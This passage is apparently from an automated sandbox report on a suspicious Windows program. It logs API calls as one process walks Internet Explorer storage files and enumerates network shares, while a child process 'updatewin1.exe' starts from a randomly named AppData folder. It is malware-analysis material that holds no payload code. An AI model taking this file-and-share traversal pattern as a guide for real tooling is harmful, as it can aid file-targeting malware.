Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.topi")) returned 1 [0099.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.225] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.225] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.226] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.226] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0099.226] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0099.226] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0099.226] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6298 | out: hHeap=0x680000) returned 1 [0099.226] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.227] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.227] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.227] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.227] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.227] PathFindFileNameW (pszPath="") returned="" [0099.228] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.228] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.228] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.228] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.229] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.229] PathFindFileNameW (pszPath="") returned="" [0099.229] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0099.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) Thread: id = 45 os_tid = 0x8d4 [0075.094] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x9e0fee0 | out: lphEnum=0x9e0fee0*=0x3198d80) returned 0x0 [0075.798] WNetEnumResourceW (in: hEnum=0x3198d80, lpcCount=0x9e0fedc, lpBuffer=0x99da910, lpBufferSize=0x9e0fed8 | out: lpcCount=0x9e0fedc, lpBuffer=0x99da910, lpBufferSize=0x9e0fed8) returned 0x0 [0075.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34a8 [0075.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34f0 [0075.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99de930 [0075.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0075.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0075.798] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x99da910, lphEnum=0x9e0fe28 | out: lphEnum=0x9e0fe28*=0x314c508) returned 0x0 [0075.905] WNetEnumResourceW (in: hEnum=0x314c508, lpcCount=0x9e0fe24, lpBuffer=0x31df0e8, lpBufferSize=0x9e0fe20 | out: lpcCount=0x9e0fe24, lpBuffer=0x31df0e8, lpBufferSize=0x9e0fe20) returned 0x103 [0075.905] WNetCloseEnum (hEnum=0x314c508) returned 0x0 [0075.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d34f0 | out: hHeap=0x680000) returned 1 [0075.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d34a8 | out: hHeap=0x680000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34a8 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34f0 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe0) returned 0x3199338 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3100 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d35c8 [0075.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0075.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0075.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99de930 | out: hHeap=0x680000) returned 1 [0075.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3538 [0075.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0075.906] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x99da930, lphEnum=0x9e0fe28 | out: lphEnum=0x9e0fe28*=0x9e0fe44) returned 0x4b8 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d34f0 | out: hHeap=0x680000) returned 1 [0093.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d34a8 | out: hHeap=0x680000) returned 1 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3d48 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3df0 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x150) returned 0x3149ab8 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34a8 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d34f0 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3ad8 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3b20 [0093.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d35c8 | out: hHeap=0x680000) returned 1 [0093.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3100 | out: hHeap=0x680000) returned 1 [0093.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3538 | out: hHeap=0x680000) returned 1 [0093.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3199338 | out: hHeap=0x680000) returned 1 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e60 [0093.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3ed0 [0093.106] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x99da950, lphEnum=0x9e0fe28 | out: lphEnum=0x9e0fe28*=0x9e0fe44) returned 0x4c6 [0093.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0093.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.154] WNetEnumResourceW (in: hEnum=0x3198d80, lpcCount=0x9e0fedc, lpBuffer=0x99da910, lpBufferSize=0x9e0fed8 | out: lpcCount=0x9e0fedc, lpBuffer=0x99da910, lpBufferSize=0x9e0fed8) returned 0x103 [0093.154] WNetCloseEnum (hEnum=0x3198d80) returned 0x0 [0093.154] SendMessageW (hWnd=0x3027c, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 46 os_tid = 0x904 Process: id = "6" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" page_root = "0x33870000" os_pid = "0x8e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x7f0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 47 os_tid = 0x8f4 [0076.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9cc0cca0, dwHighDateTime=0x1d5d6b4)) [0076.495] GetCurrentProcessId () returned 0x8e4 [0076.495] GetCurrentThreadId () returned 0x8f4 [0076.495] GetTickCount () returned 0x11595ea [0076.495] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21779131587) returned 1 [0076.518] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0076.518] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1e10000 [0076.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.526] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0076.526] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0076.527] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0076.527] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0076.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.527] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.528] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.528] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.529] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.529] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.530] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.530] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.530] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.531] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0076.531] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x214) returned 0x1e107d0 [0076.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.532] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0076.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0076.532] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0076.532] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0076.532] GetCurrentThreadId () returned 0x8f4 [0076.532] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0076.532] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x800) returned 0x1e109f0 [0076.533] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0076.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0076.533] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0076.533] SetHandleCount (uNumber=0x20) returned 0x20 [0076.533] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" " [0076.533] GetEnvironmentStringsW () returned 0x644e70* [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0076.533] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x0, Size=0x565) returned 0x1e111f8 [0076.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1e111f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0076.533] FreeEnvironmentStringsW (penv=0x644e70) returned 1 [0076.533] GetLastError () returned 0x0 [0076.534] SetLastError (dwErrCode=0x0) [0076.534] GetLastError () returned 0x0 [0076.534] SetLastError (dwErrCode=0x0) [0076.534] GetLastError () returned 0x0 [0076.534] SetLastError (dwErrCode=0x0) [0076.534] GetACP () returned 0x4e4 [0076.534] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x0, Size=0x220) returned 0x1e11768 [0076.534] GetLastError () returned 0x0 [0076.534] SetLastError (dwErrCode=0x0) [0076.534] IsValidCodePage (CodePage=0x4e4) returned 1 [0076.534] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0076.534] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0076.534] GetLastError () returned 0x0 [0076.535] SetLastError (dwErrCode=0x0) [0076.535] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0076.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0076.535] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0076.535] GetLastError () returned 0x0 [0076.535] SetLastError (dwErrCode=0x0) [0076.535] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0076.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ") returned 256 [0076.535] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.535] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0076.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@];\x8e\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0076.536] GetLastError () returned 0x0 [0076.536] SetLastError (dwErrCode=0x0) [0076.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, 